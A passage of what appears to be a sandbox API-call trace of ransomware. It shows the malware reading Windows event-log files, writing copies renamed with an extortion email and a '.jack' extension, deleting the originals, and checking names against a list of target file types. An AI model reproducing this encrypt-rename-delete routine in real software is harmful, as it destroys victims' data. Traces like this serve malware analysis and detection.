"c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.646] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0207.646] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.646] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.646] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0207.647] GetLastError () returned 0x0 [0207.647] ReadFile (in: hFile=0x430, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0207.649] WriteFile (in: hFile=0x3dc, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0207.652] ReadFile (in: hFile=0x430, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0207.652] WriteFile (in: hFile=0x3dc, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x14a, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x14a, lpOverlapped=0x0) returned 1 [0207.652] SetEndOfFile (hFile=0x3dc) returned 1 [0207.653] CloseHandle (hObject=0x3dc) returned 1 [0207.655] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.655] SetEndOfFile (hFile=0x430) returned 1 [0207.656] CloseHandle (hObject=0x430) returned 1 [0207.656] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0207.656] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx")) returned 1 [0207.657] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0207.657] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0207.657] lstrlenW (lpString=".doc") returned 4 [0207.657] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.657] lstrlenW (lpString=".docx") returned 5 [0207.657] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.657] lstrlenW (lpString=".pdf") returned 4 [0207.657] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.657] lstrlenW (lpString=".xls") returned 4 [0207.657] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.657] lstrlenW (lpString=".xlsx") returned 5 [0207.657] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.657] lstrlenW (lpString=".ppt") returned 4 [0207.657] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.657] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0207.657] lstrlenW (lpString=".zip") returned 4 [0207.657] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.657] lstrlenW (lpString=".rar") returned 4 [0207.657] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.657] lstrlenW (lpString=".bz2") returned 4 [0207.657] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.657] lstrlenW (lpString=".7z") returned 3 [0207.657] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.657] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0207.658] lstrlenW (lpString=".dbf") returned 4 [0207.658] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.658] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0207.658] lstrlenW (lpString=".1cd") returned 4 [0207.658] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.658] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0207.658] lstrlenW (lpString=".jpg") returned 4 [0207.658] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.658] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0207.658] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0207.658] lstrlenW (lpString=".doc") returned 4 [0207.658] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.658] lstrlenW (lpString=".docx") returned 5 [0207.658] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.658] lstrlenW (lpString=".pdf") returned 4 [0207.658] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.658] lstrlenW (lpString=".xls") returned 4 [0207.658] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.658] lstrlenW (lpString=".xlsx") returned 5 [0207.658] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.658] lstrlenW (lpString=".ppt") returned 4 [0207.658] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.658] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0207.658] lstrlenW (lpString=".zip") returned 4 [0207.658] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.659] lstrlenW (lpString=".rar") returned 4 [0207.659] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.659] lstrlenW (lpString=".bz2") returned 4 [0207.659] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.659] lstrlenW (lpString=".7z") returned 3 [0207.659] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.659] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0207.659] lstrlenW (lpString=".dbf") returned 4 [0207.659] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.659] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0207.659] lstrlenW (lpString=".1cd") returned 4 [0207.659] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.659] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0207.659] lstrlenW (lpString=".jpg") returned 4 [0207.659] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.659] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0207.659] lstrlenW (lpString="Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 47 [0207.659] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0207.660] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0207.660] CloseHandle (hObject=0x430) returned 1 [0207.660] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx")) returned 0x20 [0207.660] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.660] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0207.660] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.660] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.660] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0207.661] GetLastError () returned 0x0 [0207.661] ReadFile (in: hFile=0x430, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0207.711] WriteFile (in: hFile=0x3dc, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0207.713] ReadFile (in: hFile=0x430, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0207.713] WriteFile (in: hFile=0x3dc, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x132, lpOverlapped=0x0) returned 1 [0207.713] SetEndOfFile (hFile=0x3dc) returned 1 [0208.828] CloseHandle (hObject=0x3dc) returned 1 [0208.830] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0208.830] SetEndOfFile (hFile=0x430) returned 1 [0208.831] CloseHandle (hObject=0x430) returned 1 [0208.831] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0208.832] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx")) returned 1 [0208.832] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0208.832] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0208.832] lstrlenW (lpString=".doc") returned 4 [0208.832] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0208.832] lstrlenW (lpString=".docx") returned 5 [0208.832] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0208.832] lstrlenW (lpString=".pdf") returned 4 [0208.832] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0208.832] lstrlenW (lpString=".xls") returned 4 [0208.832] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0208.832] lstrlenW (lpString=".xlsx") returned 5 [0208.832] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0208.832] lstrlenW (lpString=".ppt") returned 4 [0208.832] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0208.832] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0208.832] lstrlenW (lpString=".zip") returned 4 [0208.833] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0208.833] lstrlenW (lpString=".rar") returned 4 [0208.833] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0208.833] lstrlenW (lpString=".bz2") returned 4 [0208.833] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0208.833] lstrlenW (lpString=".7z") returned 3 [0208.833] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0208.833] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0208.833] lstrlenW (lpString=".dbf") returned 4 [0208.833] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0208.833] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0208.833] lstrlenW (lpString=".1cd") returned 4 [0208.833] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0208.833] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0208.833] lstrlenW (lpString=".jpg") returned 4 [0208.833] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0208.833] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0208.833] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0208.833] lstrlenW (lpString=".doc") returned 4 [0208.833] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0208.833] lstrlenW (lpString=".docx") returned 5 [0208.833] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0208.833] lstrlenW (lpString=".pdf") returned 4 [0208.833] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0208.833] lstrlenW (lpString=".xls") returned 4 [0208.833] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0208.833] lstrlenW (lpString=".xlsx") returned 5 [0208.833] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0208.833] lstrlenW (lpString=".ppt") returned 4 [0208.834] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0208.834] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0208.834] lstrlenW (lpString=".zip") returned 4 [0208.834] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0208.834] lstrlenW (lpString=".rar") returned 4 [0208.834] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0208.834] lstrlenW (lpString=".bz2") returned 4 [0208.834] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0208.834] lstrlenW (lpString=".7z") returned 3 [0208.834] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0208.834] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0208.834] lstrlenW (lpString=".dbf") returned 4 [0208.834] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0208.834] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0208.834] lstrlenW (lpString=".1cd") returned 4 [0208.834] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0208.834] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0208.834] lstrlenW (lpString=".jpg") returned 4 [0208.834] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0208.834] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0208.834] lstrlenW (lpString="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 56 [0208.834] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0208.835] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0208.835] CloseHandle (hObject=0x430) returned 1 [0208.835] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx")) returned 0x20 [0208.835] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0208.835] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0208.835] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0208.835] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0208.835] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0208.836] GetLastError () returned 0x0 [0208.836] ReadFile (in: hFile=0x430, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0208.839] WriteFile (in: hFile=0x3dc, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0208.841] ReadFile (in: hFile=0x430, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0208.841] WriteFile (in: hFile=0x3dc, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x144, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x144, lpOverlapped=0x0) returned 1 [0208.841] SetEndOfFile (hFile=0x3dc) returned 1 [0208.841] CloseHandle (hObject=0x3dc) returned 1 [0208.845] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0208.845] SetEndOfFile (hFile=0x430) returned 1 [0208.846] CloseHandle (hObject=0x430) returned 1 [0208.846] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0208.847] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx")) returned 1 [0208.847] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0208.847] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0208.847] lstrlenW (lpString=".doc") returned 4 [0208.847] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0208.847] lstrlenW (lpString=".docx") returned 5 [0208.847] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0208.847] lstrlenW (lpString=".pdf") returned 4 [0208.847] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0208.847] lstrlenW (lpString=".xls") returned 4 [0208.848] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0208.848] lstrlenW (lpString=".xlsx") returned 5 [0208.848] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0208.848] lstrlenW (lpString=".ppt") returned 4 [0208.848] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0208.848] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0208.848] lstrlenW (lpString=".zip") returned 4 [0208.848] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0208.848] lstrlenW (lpString=".rar") returned 4 [0208.848] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0208.848] lstrlenW (lpString=".bz2") returned 4 [0208.848] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0208.848] lstrlenW (lpString=".7z") returned 3 [0208.848] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0208.848] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0208.848] lstrlenW (lpString=".dbf") returned 4 [0208.848] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0208.848] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0208.848] lstrlenW (lpString=".1cd") returned 4 [0208.848] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0208.848] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0208.848] lstrlenW (lpString=".jpg") returned 4 [0208.848] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0208.848] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0208.848] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0208.848] lstrlenW (lpString=".doc") returned 4 [0208.848] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0208.849] lstrlenW (lpString=".docx") returned 5 [0208.849] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0208.849] lstrlenW (lpString=".pdf") returned 4 [0208.849] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0208.849] lstrlenW (lpString=".xls") returned 4 [0208.849] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0208.849] lstrlenW (lpString=".xlsx") returned 5 [0208.849] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0208.849] lstrlenW (lpString=".ppt") returned 4 [0208.849] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0208.849] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0208.849] lstrlenW (lpString=".zip") returned 4 [0208.849] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0208.849] lstrlenW (lpString=".rar") returned 4 [0208.849] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0208.849] lstrlenW (lpString=".bz2") returned 4 [0208.849] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0208.849] lstrlenW (lpString=".7z") returned 3 [0208.849] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0208.849] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0208.849] lstrlenW (lpString=".dbf") returned 4 [0208.849] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0208.849] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0208.849] lstrlenW (lpString=".1cd") returned 4 [0208.849] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0208.849] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0208.849] lstrlenW (lpString=".jpg") returned 4 [0208.849] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0208.850] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0208.850] lstrlenW (lpString="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 53 [0208.850] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0208.850] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0208.850] CloseHandle (hObject=0x430) returned 1 [0208.850] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx")) returned 0x20 [0208.850] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0208.850] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0208.851] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0208.851] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0208.851] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0208.851] GetLastError () returned 0x0 [0208.851] ReadFile (in: hFile=0x430, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0208.855] WriteFile (in: hFile=0x3dc, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: 